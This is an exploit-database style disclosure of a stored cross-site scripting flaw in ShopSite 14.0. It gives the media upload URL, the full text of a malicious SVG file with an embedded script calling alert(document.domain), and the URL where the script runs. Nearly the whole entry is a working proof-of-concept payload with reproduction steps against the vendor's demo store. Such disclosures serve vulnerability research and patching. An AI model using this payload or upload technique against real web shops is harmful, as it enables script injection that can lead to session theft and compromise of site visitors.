# Exploit Title: ShopSite Version: 14.0 - Stored XSS
# Date: 2023-12-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://www.shopsite.com/
# Version: 14.0
# Tested on: https://www.shopsite.com/demo.html1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi
poc.svg
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
<script>//<![CDATA[
alert(document.domain)
//]]>
</script>
</svg>
2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg